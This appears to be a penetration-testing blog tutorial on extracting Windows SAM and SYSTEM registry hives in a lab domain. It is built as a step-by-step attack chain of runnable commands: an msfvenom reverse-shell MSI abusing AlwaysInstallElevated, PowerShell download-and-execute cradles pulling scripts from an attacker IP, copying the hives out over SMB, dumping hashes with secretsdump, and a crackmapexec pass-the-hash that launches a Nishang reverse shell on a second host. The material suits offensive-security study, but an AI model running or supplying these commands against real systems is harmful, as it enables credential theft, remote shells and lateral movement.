Table of Contents

In this post we will review various techniques that can be used to extract a copy of the SAM and SYSTEM files from a Windows host. We will explore how to do this using tools such as: reg.exe, wmic.exe, and Copy-VSS.ps1. We will have a look at a scenario where we will escalate privileges to SYSTEM leveraging a misconfigured registry value and then extract the SAM and SYSTEM files in a few different ways. From there we will see how we can transfer those files to our attacker machine and dump the hashes locally. Finally, we will see how we can use the local administrator hash to perform a pass-the-hash attack.

The Security Accounts Manager (SAM) is a database file in the Microsoft Windows operating system (OS) that contains local account usernames and passwords.

SAM is part of the registry, it is locally stored on disk, and it is used for local logins only. If the machine is domain joined, the domain user logon attempts are handled by Active Directory (AD).

The SAM and SYSTEM files are located in C:\Windows\System32\Config but you cannot copy those files while the system is running!

Example Scenario: Privilege Escalation with AlwaysInstallElevated

In this scenario we have three domain joined machines. The first two machines are Windows 10 hosts (172.16.1.100 and 172.16.1.200) and the third is the Domain Controller (172.16.1.5).

For some context, we have gotten a foothold on the Windows 10 host as a regular domain user: meisenhardt. We found the users credentials in a file in the SMB share that we had NULL access to.

After gaining a foothold, we decide to start our enumeration by running PowerUp.ps1.

PowerUp.ps1 is part of the PowerSploit Collection of Tools and is a great tool to use for post-exploitation enumeration to find quick wins. Generally I use this tool before WinPEAS.

Once you have downloaded the PowerSploit collection, copy PowerUp.ps1 to your working directory and append the following command to the bottom of the script:

Invoke-AllChecks

Next, we need to start an HTTP server out of our working directory to serve the script up to the victim.

python3 -m http.server 80

Back on the victim, we execute the following IEX command to download the script directly into memory. This will auto-execute the command we hardcoded at the bottom of the script and check for vulnerabiltiies.

iex(new-object net.webclient).downloadstring('http://172.16.1.30/PowerUp.ps1')

Reviewing the output of PowerUp.ps1, we see that AlwaysInstallElevated is turned on in the registry!

For most of the vulnerabilities PowerUp finds, it has an “AbuseFunction” command that can be used to auto-pwn. However, if we were to use the command Write-UserAddMSI, then a pop-up box would appear on the victim and would require us to have GUI access to interact with it. So instead, we will just craft our own exploit for this using msfvenom.

Before we craft our exploit we need to find the architecture of the OS we are exploiting. This can be done using the following command:

cmd.exe /c 'systeminfo | findstr /B /C:"Host Name" /C:"OS Name" /C:"OS Version" /C:"System Type" /C:"Hotfix(s)"'

We prepended ‘cmd.exe /c’ to our command because systeminfo can cause the shell to hang when executed from a PowerShell prompt.

After determining this is an x64 system, we head back to our attacker machine to craft our exploit from our working directory like so:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=172.16.1.30 LPORT=443 -a x64 --platform Windows -f msi -o evil.msi

MSI is an installer package file format used by Windows. When executed on the victim, this exploit will “install” with elevated privileges due to AlwaysInstallElevated being enabled and produce a SYSTEM shell.

Since we already have an HTTP server running from our working directory, we can use the following command to download the exploit onto the victim:

IWR -Uri http://172.16.1.30/evil.msi -OutFile evil.msi

All we need to do now is start a netcat listener on our attacker machine on port 443 and then execute evil.msi on the victim.

After executing the payload, we see that we have gotten a SYSTEM shell back on our listener.

To extract a copy of the SAM and SYSTEM files you need to have local/domain administrator or SYSTEM privileges.

Extracting a Copy of the SAM and SYSTEM Files Using reg.exe

Now that we have elevated our privileges, we can copy the SAM and SYSTEM files from the registry using reg.exe.

This technique is trivial and can be accomplished with the following two commands:

reg save hklm\sam C:\temp\SAM
reg save hklm\system C:\temp\SYSTEM

To use the above commands you will need to first create the C:\temp directory. It is always a good idea to create C:\temp when you first get a foothold on the victim. This way you can download all of your tools to a single location, which will allow for easy clean up at the end of the engagement by just deleting the entire folder.

Now that we have extracted a copy of both files, we need to transfer the files to our attacker machine. For this example, we will setup an SMB share and transfer the files back to our attacker machine that way.

From the working directory on the attacker machine, run the following command:

impacket-smbserver share $(pwd) -smb2support

impacket-smbserver is part of the Impacket Suite of Tools, which is an excellent collection that all hackers NEED to have in their tool belt.

With our share setup, we can copy the files over to our attacker machine from the victim like so:

copy .\SAM \\172.16.1.30\share
copy .\SYSTEM \\172.16.1.30\share

And back on our attacker machine, we see the victim checked in and sent the files.

Extracting the Hashes with secretsdump.py and samdump2

Now that we have exfiltrated a copy of the SYSTEM and SAM file onto our attacker machine, we can easily dump the hashes using one of two tools: secretsdump.py and samdump2.

Starting with secretsdump.py, which is also part of the Impacket Suite of Tools, we can dump the hashes using the following command:

secretsdump.py -sam SAM -system SYSTEM LOCAL

And then to use samdump2 to dump the hashes the same way, the command is simply:

samdump2 SYSTEM SAM

For some reason samdump2 failed here as the both the NT and LM are coming up as blank for all accounts. This is exactly why we need to have multiple tools to accomplish a single task. When one fails, we can try another.

From both of these dumps, we are most interested in the local administrator hash. We will be using the local admin hash to perform a pass-the-hash attack onto Windows 10 host – 172.16.1.200.

Using the Local Admin Hash in a Pass-the-Hash Attack on the Second Windows 10 Host

There are many tools we can use to pass-the hash. For this example, we will test if we are able to pass-the-hash with a great tool called crackmapexec. Then we will use crackmapexec to perform our pass-the-hash attack.

Using the following command, we can check to see if the local admin user has the same password on both machines:

crackmapexec smb 172.16.1.100 172.16.1.200 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth --continue-on-success

Seeing Pwn3d! for this user / hash combo on both machines means that the local admin password is reused.

Now that we have confirmed that the local admin password was reused on both hosts, we can use crackmapexec to perform a pass-the-hash attack to pivot and get a shell on 172.16.1.200.

With crackmapexec we can use the -x switch to execute commands from cmd.exe or the -X switch to perform commands using PowerShell.

There are many ways we can get a shell now that we have command execution, but for this example we are going to use a PowerShell reverse shell script from the Nishang Collection of Scripts. The script we will be using is called Invoke-PowerShellTcp.ps1.

Copy the script into your working directory and then append the following command to the bottom of the script:

Edit the IP address to the IP of your attacker machine.

Invoke-PowerShellTcp -Reverse -IPAddress 172.16.1.30 -Port 443

I generally keep multiple copies of this script in my exploits folder with the same command at the bottom but over different ports. Then I append the port number to the name of each copy.

After copying the script to your working directory and appending the command at the bottom, start an HTTP server from the same directory as the script.

Next we will need to start a netcat listener on our attacker machine to catch the shell over port 443. Then we can run the following command using crackmapexec to get a reverse shell:

crackmapexec smb 172.16.1.200 -u administrator -H 3542d79d5d17bc9d3014d4d56b5e3060 --local-auth -X "iex(new-object net.webclient).downloadstring('http://172.16.1.30/Invoke-PowerShellTcp443.ps1')"

After executing the command we see the Pwn3d! message and the prompt hangs…

And back on our listener, we get a reverse shell and successfully pivoted using a pass-the-hash attack.

Now that we have pivoted to a new host as the local admin user, we could dump the LSASS process and check if there are any tokens lying around that will allow us to pivot to another host. Maybe a domain admin left a token on this host and we can steal that to pivot to the DC.

Once you get a foothold on a domain joined host and then elevate to admin/SYSTEM, you wan to dump both the SAM file and the LSASS process to see what new hashes you will find that can be passed. For more examples on how to dump the LSASS process, check out my post on the topic here. Also, to see teh different ways to perform a pass-the-hash attack, check this post I made here.

Extracting a Copy of the SAM and SYSTEM Files Using Alternative Methods

Finding Backups of the SAM and SYSTEM Files Already on the System

In some instances you may find that backups of the SAM and SYSTEM files are already on the system. Most commonly, you will find backups stored in C:\Windows\System32\Config, C:\Windows\System32\Repair, or C:\Windows\System32\Config\Regback. These files will also likely have the .OLD or .BAK extension.

These files will likely require admin privileges to interact with. However, you may get lucky and find a regular user has permissions to these backup files. That being said, it doesn’t hurt to look for them when you get a foothold on a victim using the following command:

cd C:\ & dir /S /B SAM == SYSTEM == SAM.OLD == SYSTEM.OLD == SAM.BAK == SYSTEM.BAK

Then, using icacls, we check the permissions on the backup files and we find that our standard domain user has Modify permissions. This means we can copy these files to a folder that this user owns and transfer it back to our attacker machine.

In the above example we found that a regular user had modify permissions on the SAM and SYSTEM backup files. In this case, this would be a privilege escalation from regular user to local admin.

Searching for these backups already on the system comes in handy during other scenarios as well. Lets say for example you are hacking a machine that has a web application with a directory traversal vulnerability or you find that UDP port 69 is hosting a TFTP server. Since you are working blind in both cases, you may get lucky looking for these backups.

Extracting a Copy of the SAM and SYSTEM Files Using wmic.exe

Another way to extract a copy of the SAM and SYSTEM files after getting admin/SYSTEM is to create a shadow copy of C: using WMIC.

After creating a shadow copy of C:, you can access and copy the SAM and SYSTEM files from the C:\Windows\System32\Config folder in the shadow copy.

When the system is running you cannot access the SAM and SYSTEM files directly; however, a shadow copy is just a snapshot of the machines current state so the files within the shadow copy can be accessed since they are not in use.

To create a shadow copy of C: using wmic.exe, use the following commands:

wmic shadowcopy call create Volume='C:\'

Next we need to use the following command to see the file location of our shadow copy:

vssadmin.exe list shadows

Now that we know the file location of the shadow copy, we can be tidy by creating a C:\temp folder and then copy the SAM and SYSTEM files into it.

mkdir C:\temp
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SYSTEM C:\temp\SYSTEM
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy3\Windows\System32\config\SAM C:\temp\SAM

Extracting a Copy of the SAM and SYSTEM Files Using Copy-VSS.ps1

The last way we will extract a copy of the SAM and SYSTEM files for this example is using a tool called Copy-VSS.ps1, which is also from the Nishang Collection of Scripts.